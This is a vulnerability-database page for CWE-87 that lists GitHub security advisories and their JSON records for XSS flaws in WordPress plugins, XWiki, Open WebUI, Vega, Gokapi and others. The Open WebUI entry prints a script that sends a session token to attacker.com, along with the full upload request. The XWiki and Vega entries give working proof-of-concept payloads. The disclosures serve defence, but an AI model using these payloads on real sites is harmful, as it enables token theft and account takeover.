Common Weakness Enumeration

CWE-87

Allowed

Improper Neutralization of Alternate XSS Syntax

Abstraction: Variant · Status: Draft

The product does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.

98 vulnerabilities reference this CWE, most recent first.

GHSA-6C6J-Q3H4-VP82

Vulnerability from github – Published: 2025-10-15 06:31 – Updated: 2025-10-15 06:31
VLAI
Details

The Ova Advent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-8561"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-87"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-15T06:15:46Z",
    "severity": "MODERATE"
  },
  "details": "The Ova Advent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin\u0027s shortcodes in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
  "id": "GHSA-6c6j-q3h4-vp82",
  "modified": "2025-10-15T06:31:10Z",
  "published": "2025-10-15T06:31:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8561"
    },
    {
      "type": "WEB",
      "url": "https://themeforest.net/item/em4u-event-management-multipurpose-wordpress-theme/20846579"
    },
    {
      "type": "WEB",
      "url": "https://themeforest.net/item/em4u-event-management-multipurpose-wordpress-theme/20846579#item-description__change_log"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/da6bf521-0c22-4839-8fa6-a0d67e28cfbd?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-735F-W79P-282X

Vulnerability from github – Published: 2023-08-03 16:32 – Updated: 2023-08-03 19:40
VLAI
Summary
pimcore/customer-management-framework-bundle Cross-site Scripting vulnerability in Segment name
Details

Impact

As HTML injection works in email an attacker can trick a victim to click on such hyperlinks to redirect him to any malicious site and also can host a XSS page. All this will surely cause some damage to the victim. This could lead to users being tricked into giving logins away to malicious attackers.

Patches

Update to version 3.4.2 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch

Workarounds

Apply https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch manually.

References

https://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0/

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/customer-management-framework-bundle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-4145"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-03T16:32:49Z",
    "nvd_published_at": "2023-08-03T17:15:12Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nAs HTML injection works in email an attacker can trick a victim to click on such hyperlinks to redirect him to any malicious site and also can host a XSS page. All this will surely cause some damage to the victim. This could lead to users being tricked into giving logins away to malicious attackers.\n\n### Patches\nUpdate to version 3.4.2 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch\n\n### Workarounds\nApply https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch manually.\n\n### References\nhttps://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0/\n",
  "id": "GHSA-735f-w79p-282x",
  "modified": "2023-08-03T19:40:12Z",
  "published": "2023-08-03T16:32:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-735f-w79p-282x"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4145"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pimcore/customer-data-framework"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pimcore/customer-management-framework-bundle Cross-site Scripting vulnerability in Segment name"
}

GHSA-73H7-MVV6-M363

Vulnerability from github – Published: 2024-05-22 09:31 – Updated: 2026-04-08 21:32
VLAI
Details

The Opal Estate Pro – Property Management and Submission plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the agent latitude and longitude parameters in all versions up to, and including, 1.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-3666"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-87"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-22T08:15:10Z",
    "severity": "MODERATE"
  },
  "details": "The Opal Estate Pro \u2013 Property Management and Submission plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the agent latitude and longitude parameters in all versions up to, and including, 1.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
  "id": "GHSA-73h7-mvv6-m363",
  "modified": "2026-04-08T21:32:40Z",
  "published": "2024-05-22T09:31:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3666"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/opal-estate-pro"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4d5d58f-913a-4a26-8b2a-bfdd08033993?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-834C-X29C-F42C

Vulnerability from github – Published: 2023-06-22 19:59 – Updated: 2023-06-30 20:24
VLAI
Summary
XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in delete template
Details

Impact

Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the delete template to perform a XSS, e.g. by using URL such as:

xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)

This vulnerability exists since XWiki 6.0-rc-1.

Patches

The vulnerability has been patched in XWiki 14.10.6 and 15.1. Note that a partial patch has been provided in 14.10.5 but wasn't enough to entirely fix the vulnerability.

Workarounds

It's possible to workaround the vulnerability by editing the template delete.vm to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets.

References

  • Jira ticket about the original vulnerability: https://jira.xwiki.org/browse/XWIKI-20341
  • Commit containing the first fix in the template: https://github.com/xwiki/xwiki-platform/commit/e80d22d193df364b07bab7925572720f91a8984a
  • Jira ticket about the second part of the vulnerability found after 14.10.5: https://jira.xwiki.org/browse/XWIKI-20672
  • Commits containing the second fix in the template:
    • https://github.com/xwiki/xwiki-platform/commit/13875a6437d4525ac4aeea25918f2d2dffac9ee1
    • https://github.com/xwiki/xwiki-platform/commit/24ec12890ac7fa6daec8d0b3435cfcba11362fd5
  • Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List

Attribution

This vulnerability has been reported by René de Sain @renniepak.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-flamingo-skin-resources"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0-rc-1"
            },
            {
              "fixed": "14.10.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-flamingo-skin-resources"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.0-rc-0"
            },
            {
              "fixed": "15.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-35156"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-22T19:59:10Z",
    "nvd_published_at": "2023-06-23T19:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nUsers are able to forge an URL with a payload allowing to inject Javascript in the page (XSS).\nIt\u0027s possible to exploit the delete template to perform a XSS, e.g. by using URL such as:\n\n\u003e xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart\u0026vm=delete.vm\u0026xredirect=javascript:alert(document.domain)\n\nThis vulnerability exists since XWiki 6.0-rc-1.\n\n### Patches\n\nThe vulnerability has been patched in XWiki 14.10.6 and 15.1. Note that a partial patch has been provided in 14.10.5 but wasn\u0027t enough to entirely fix the vulnerability. \n\n### Workarounds\n\nIt\u0027s possible to workaround the vulnerability by editing the template delete.vm to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets.\n\n### References\n\n  * Jira ticket about the original vulnerability: https://jira.xwiki.org/browse/XWIKI-20341\n  * Commit containing the first fix in the template: https://github.com/xwiki/xwiki-platform/commit/e80d22d193df364b07bab7925572720f91a8984a\n  * Jira ticket about the second part of the vulnerability found after 14.10.5: https://jira.xwiki.org/browse/XWIKI-20672\n  * Commits containing the second fix in the template: \n    * https://github.com/xwiki/xwiki-platform/commit/13875a6437d4525ac4aeea25918f2d2dffac9ee1\n    * https://github.com/xwiki/xwiki-platform/commit/24ec12890ac7fa6daec8d0b3435cfcba11362fd5\n  * Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n\n### Attribution\n\nThis vulnerability has been reported by Ren\u00e9 de Sain @renniepak.",
  "id": "GHSA-834c-x29c-f42c",
  "modified": "2023-06-30T20:24:46Z",
  "published": "2023-06-22T19:59:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-834c-x29c-f42c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35156"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/13875a6437d4525ac4aeea25918f2d2dffac9ee1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/24ec12890ac7fa6daec8d0b3435cfcba11362fd5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/e80d22d193df364b07bab7925572720f91a8984a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki/xwiki-platform"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-20341"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-20583"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-20672"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in delete template"
}

GHSA-8GH5-QQH8-HQ3X

Vulnerability from github – Published: 2026-07-07 16:50 – Updated: 2026-07-07 16:50
VLAI
Summary
Open WebUI allows limited stored XSS vila uploaded html file
Details

Summary

Low privileged users can upload HTML files which contain JavaScript code via the /api/v1/files/ backend endpoint. This endpoint returns a file id, which can be used to open the file in the browser and trigger the JavaScript code in the user's browser. Under the default settings, files uploaded by low-privileged users can only be viewed by admins or themselves, limiting the impact of this vulnerability.

Details

The following HTTP request can be sent to the backend server to upload a file with the contents: <script>fetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script>

POST /api/v1/files/ HTTP/1.1
Host: localhost:8080
Content-Length: 286
authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijg2NjA1NTZhLTc0OWQtNDdmNS1iMjgwLWRiYzkyYzc2ZjM1NiJ9.4cImklYQUVi3dlXmRtQwdZKEleu0cq4tXompMod8X2U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0PnRBBHKXD9UEdm

------WebKitFormBoundaryr0PnRBBHKXD9UEdm
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: text/html

<h1>padding</h1>
<script>fetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script>
------WebKitFormBoundaryr0PnRBBHKXD9UEdm--

Note the filename="test.html" , Content-Type: text/html, and `

padding

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.6.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46571"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-07T16:50:43Z",
    "nvd_published_at": "2025-05-05T19:15:57Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nLow privileged users can upload HTML files which contain JavaScript code via the `/api/v1/files/` backend endpoint. This endpoint returns a file id, which can be used to open the file in the browser and trigger the JavaScript code in the user\u0027s browser. Under the default settings, files uploaded by low-privileged users can only be viewed by admins or themselves, limiting the impact of this vulnerability.\n\n### Details\n\nThe following HTTP request can be sent to the backend server to upload a file with the contents:\n`\u003cscript\u003efetch(\"https://attacker.com/?token=\" + localStorage.getItem(\"token\"))\u003c/script\u003e`\n\n```http\nPOST /api/v1/files/ HTTP/1.1\nHost: localhost:8080\nContent-Length: 286\nauthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijg2NjA1NTZhLTc0OWQtNDdmNS1iMjgwLWRiYzkyYzc2ZjM1NiJ9.4cImklYQUVi3dlXmRtQwdZKEleu0cq4tXompMod8X2U\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0PnRBBHKXD9UEdm\n\n------WebKitFormBoundaryr0PnRBBHKXD9UEdm\nContent-Disposition: form-data; name=\"file\"; filename=\"test.html\"\nContent-Type: text/html\n\n\u003ch1\u003epadding\u003c/h1\u003e\n\u003cscript\u003efetch(\"https://attacker.com/?token=\" + localStorage.getItem(\"token\"))\u003c/script\u003e\n------WebKitFormBoundaryr0PnRBBHKXD9UEdm--\n```\n\nNote the `filename=\"test.html\"` , `Content-Type: text/html`, and `\u003ch1\u003epadding\u003c/h`\u003e in the request\u0027s body. These are important because some form of sanitization or filtering was observed which caused errors when uploading an html file that only conained a `\u003cscript\u003e` tag. \n\nThe backend server responds to the above request with JSON data that contains an `id` parameter. \n\n![image](https://github.com/user-attachments/assets/ac15e108-d385-4e58-b29a-eb79aafbffda)\n\nThis ID can be used to view the uploaded file in the browser at `\u003cBackend_URL\u003e/api/v1/files/\u003cfile_id\u003e/content/html`\n\nBecause of the authorization checks done on lines https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/files.py#L434-L438, this file can only be viewed by admins and the user that uploaded it, but not by other low-privileged users, thus limiting the imact of this stored XSS vulnerability.\n\n### PoC\n\nFirst, upload an html containing JavaScript code to the backend server using the following HTTP request:\n```http\nPOST /api/v1/files/ HTTP/1.1\nHost: localhost:8080\nContent-Length: 286\nauthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijg2NjA1NTZhLTc0OWQtNDdmNS1iMjgwLWRiYzkyYzc2ZjM1NiJ9.4cImklYQUVi3dlXmRtQwdZKEleu0cq4tXompMod8X2U\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0PnRBBHKXD9UEdm\n\n------WebKitFormBoundaryr0PnRBBHKXD9UEdm\nContent-Disposition: form-data; name=\"file\"; filename=\"test.html\"\nContent-Type: text/html\n\n\u003ch1\u003epadding\u003c/h1\u003e\n\u003cscript\u003efetch(\"https://attacker.com/?token=\" + localStorage.getItem(\"token\"))\u003c/script\u003e\n------WebKitFormBoundaryr0PnRBBHKXD9UEdm--\n```\n\nThen copy the `id` from the response and use it to view the file in the browser at `\u003cBackend_URL\u003e/api/v1/files/\u003cfile_id\u003e/content/html`\n\n\n### Impact\n\nLow privileged users can upload HTML files containing malicious JavaScript code. A link to such a file can be sent to an admin, and if clicked, will give the low-privileged user complete control over the admin\u0027s account, ultimately enabling RCE via functions, as described in https://github.com/open-webui/open-webui/security/advisories/GHSA-9f4f-jv96-8766",
  "id": "GHSA-8gh5-qqh8-hq3x",
  "modified": "2026-07-07T16:50:43Z",
  "published": "2026-07-07T16:50:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8gh5-qqh8-hq3x"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46571"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/commit/ef2aeb7c0eb976bac759e59ac359c94a5b8dc7e0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/files.py#L434-L438"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.6.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Open WebUI  allows limited stored XSS vila uploaded html file"
}

GHSA-8WH8-C2XR-4HXJ

Vulnerability from github – Published: 2024-06-06 06:30 – Updated: 2026-04-08 21:32
VLAI
Details

The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget's titles in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-4459"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-06T04:15:12Z",
    "severity": "MODERATE"
  },
  "details": "The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin\u0027s widget\u0027s titles in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
  "id": "GHSA-8wh8-c2xr-4hxj",
  "modified": "2026-04-08T21:32:43Z",
  "published": "2024-06-06T06:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4459"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/themesflat-addons-for-elementor/trunk/widgets/widget-simple-slide.php#L1117"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026new=3099056%40themesflat-addons-for-elementor\u0026old=3097003%40themesflat-addons-for-elementor\u0026sfp_email=\u0026sfph_mail=#file25"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ce7c2f30-188a-4ae7-976f-c7f0aaf96eee?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-95RC-WC32-GM53

Vulnerability from github – Published: 2025-06-03 06:28 – Updated: 2025-08-26 20:09
VLAI
Summary
Gokapi vulnerable to stored XSS via uploading file with malicious file name
Details

Impact

When using end-to-end encryption, a stored XSS vulnerability can be exploited by uploading a file with JavaScript code embedded in the filename. After upload and every time someone opens the upload list, the script is then parsed.

With the affected versions <v2.0, there was no user permission system implemented, therefore all authenticated users were already able to see and modify all resources, even if end-to-end encrypted, as the encryption key had to be the same for all users with <v2.0. Nethertheless with XSS, other attack vectors like redirection or crypto mining would be possble.

Patches

This CVE has been fixed in v2.0.0

Workarounds

If you are the only authenticated user using Gokapi, you are not affected. A workaround would be to disable end-to-end encryption.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/forceu/gokapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.1"
            },
            {
              "last_affected": "1.9.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/forceu/gokapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20250530191232-343cc566cfd7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48494"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-03T06:28:08Z",
    "nvd_published_at": "2025-06-02T11:15:22Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nWhen using end-to-end encryption, a stored XSS vulnerability can be exploited by uploading a file with JavaScript code embedded in the filename. After upload and every time someone opens the upload list, the script is then parsed.\n\nWith the affected versions \u003cv2.0, there was no user permission system implemented, therefore all authenticated users were already able to see and modify all resources, even if end-to-end encrypted, as the encryption key had to be the same for all users with \u003cv2.0. Nethertheless with XSS, other attack vectors like redirection or crypto mining would be possble.\n\n### Patches\n\nThis CVE has been fixed in v2.0.0\n\n### Workarounds\n\nIf you are the only authenticated user using Gokapi, you are not affected. A workaround would be to disable end-to-end encryption.",
  "id": "GHSA-95rc-wc32-gm53",
  "modified": "2025-08-26T20:09:18Z",
  "published": "2025-06-03T06:28:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Forceu/Gokapi/security/advisories/GHSA-95rc-wc32-gm53"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48494"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Forceu/Gokapi/commit/343cc566cfd7f4efcd522c92371561d494aed6b0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Forceu/Gokapi"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Forceu/Gokapi/releases/tag/v2.0.0"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3737"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gokapi vulnerable to stored XSS via uploading file with malicious file name"
}

GHSA-963H-3V39-3PQF

Vulnerability from github – Published: 2025-03-27 18:00 – Updated: 2025-03-27 18:00
VLAI
Summary
Vega vulnerable to Cross-site Scripting via RegExp.prototype[@@replace]
Details

Impact

Users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the vega-interpreter.

Workarounds

POC Summary

Calling replace with a RegExp-like pattern calls RegExp.prototype[@@replace], which can then call an attacker-controlled exec function.

POC Details

Consider the function call replace('foo', {__proto__: /h/.constructor.prototype, global: false}). Since pattern has RegExp.prototype[@@replace], pattern.exec('foo') winds up being called.

The resulting malicious call looks like this:

replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false})

Since functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse event.view to gain access to eval.

Reproduction steps

{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]}
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vega"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.32.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "vega-functions"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.17.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-27793"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-27T18:00:24Z",
    "nvd_published_at": "2025-03-27T14:15:54Z",
    "severity": "MODERATE"
  },
  "details": "## Impact\n\nUsers running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the `vega-interpreter`.\n\n## Workarounds\n\n- Use `vega` with [expression interpreter](https://vega.github.io/vega/usage/interpreter/)\n- Upgrade to a [newer Vega version](https://github.com/vega/vega/releases/tag/v5.32.0) (`5.32.0`)\n\n### POC Summary\n\nCalling `replace` with a `RegExp`-like pattern calls `RegExp.prototype[@@replace]`, which can then call an attacker-controlled `exec` function.\n\n### POC Details\n\nConsider the function call `replace(\u0027foo\u0027, {__proto__: /h/.constructor.prototype, global: false})`. Since `pattern` has `RegExp.prototype[@@replace]`, `pattern.exec(\u0027foo\u0027)` winds up being called.\n\nThe resulting malicious call looks like this:\n```\nreplace(\u003cstring argument\u003e, {__proto__: /h/.constructor.prototype, exec: \u003cfunction\u003e, global: false})\n```\n\nSince functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse `event.view` to gain access to `eval`.\n\n### Reproduction steps\n\n```\n{\"$schema\":\"https://vega.github.io/schema/vega/v5.json\",\"signals\":[{\"name\":\"a\",\"on\":[{\"events\":\"body:mousemove{99999}\",\"update\":\"replace(\u0027alert(1)\u0027,{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})\"}]}]}\n```",
  "id": "GHSA-963h-3v39-3pqf",
  "modified": "2025-03-27T18:00:24Z",
  "published": "2025-03-27T18:00:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vega/vega/security/advisories/GHSA-963h-3v39-3pqf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27793"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vega/vega/commit/694560c0aa576df8b6c5f0f7d202ac82233e6966"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vega/vega"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vega/vega/releases/tag/v5.32.0"
    },
    {
      "type": "WEB",
      "url": "https://vega.github.io/vega/usage/interpreter"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Vega vulnerable to Cross-site Scripting via RegExp.prototype[@@replace]"
}

GHSA-CP48-9XX4-PMJ6

Vulnerability from github – Published: 2026-04-07 21:32 – Updated: 2026-04-07 21:32
VLAI
Details

Improper neutralization of alternate XSS syntax vulnerability in The Wikimedia Foundation Mediawiki - Wikilove Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Wikilove Extension: 1.43.7, 1.44.4, 1.45.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-22711"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-87"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
